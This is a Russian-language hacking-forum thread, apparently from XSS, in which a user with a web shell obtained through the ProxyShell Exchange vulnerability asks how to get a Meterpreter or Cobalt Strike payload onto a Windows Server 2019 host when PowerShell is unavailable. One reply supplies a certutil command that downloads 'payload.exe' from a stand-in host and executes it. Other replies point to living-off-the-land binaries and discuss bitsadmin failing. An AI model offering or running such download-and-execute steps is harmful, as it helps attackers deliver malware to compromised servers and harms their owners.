• XSS.stack #1 – первый литературный журнал от юзеров форума

Cmd Shell и как пробраться дальше если пвш откисает?

Отслеживать
ynvazik

ynvazik

HDD-drive
Забанен
Регистрация
10.08.2021
Сообщения
37
Реакции
6
Пожалуйста, обратите внимание, что пользователь заблокирован
Всем привет, новичок в этом деле, всё же буду надеяться на помощь, такой вопросик возник, вот у нас есть cmd shell, пвш как варик сразу минус(Система старая к примеру либо там пвш 1-2 версии), как можно пробросить какой либо пейлоад и работать в удобной среде по типу msf=>meterpreter либо там коба и тд....?
Буду рад помощи,

Если кто хочет в лс помочь:
Токс - 126FB399F98CA0E0E977905DA2BD543712DA73DD3519A66EB78CA9A0860E9B5314D4CBB1595E

Заранее пасиб!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ynvazik сказал(а):
Всем привет, новичок в этом деле, всё же буду надеяться на помощь, такой вопросик возник, вот у нас есть cmd shell, пвш как варик сразу минус(Система старая к примеру либо там пвш 1-2 версии), как можно пробросить какой либо пейлоад и работать в удобной среде по типу msf=>meterpreter либо там коба и тд....?
Буду рад помощи,

Если кто хочет в лс помочь:
Токс - 126FB399F98CA0E0E977905DA2BD543712DA73DD3519A66EB78CA9A0860E9B5314D4CBB1595E

Заранее пасиб!
А да, битс админ в моём случаи не воркает
Хз почему

После его юза сессию веб шелла сразу скидывает(Если что веб шелл получаю через proxyshell уязвимость)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
А версия винды какая? Если 10, то есть curl по умолчанию. Через него можешь любой пэйлоад качнуть.
Но у тебя вряд-ли 10, потому что ты повершелл откинул, а повершелл 2.0 есть с семерки
Еще есть варик через certutil качать (вроде с XP) поддерживается.

Код: 
certutil.exe -urlcache -split -f "http://host/payload.exe" helloworld.exe
helloworld.exe
 
Пожалуйста, обратите внимание, что пользователь заблокирован
CheckerChin сказал(а):
А версия винды какая? Если 10, то есть curl по умолчанию. Через него можешь любой пэйлоад качнуть.
Но у тебя вряд-ли 10, потому что ты повершелл откинул, а повершелл 2.0 есть с семерки
Еще есть варик через certutil качать (вроде с XP) поддерживается.

Код: 
certutil.exe -urlcache -split -f "http://host/payload.exe" helloworld.exe
helloworld.exe
Проверю и отпишу, спасибо!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
CheckerChin сказал(а):
А версия винды какая? Если 10, то есть curl по умолчанию. Через него можешь любой пэйлоад качнуть.
Но у тебя вряд-ли 10, потому что ты повершелл откинул, а повершелл 2.0 есть с семерки
Еще есть варик через certutil качать (вроде с XP) поддерживается.

Код: 
certutil.exe -urlcache -split -f "http://host/payload.exe" helloworld.exe
helloworld.exe
Там win server 2019
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Pernat1y сказал(а):
Тут смотри

LOLBAS

lolbas-project.github.io lolbas-project.github.io
На самом деле там проблема больше в том что prosyshell криво воркает, как только выполняешь любую команду в том шелле который тебе :предоставил: proxyshell_rce, вылетает вебшелл и всё....
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх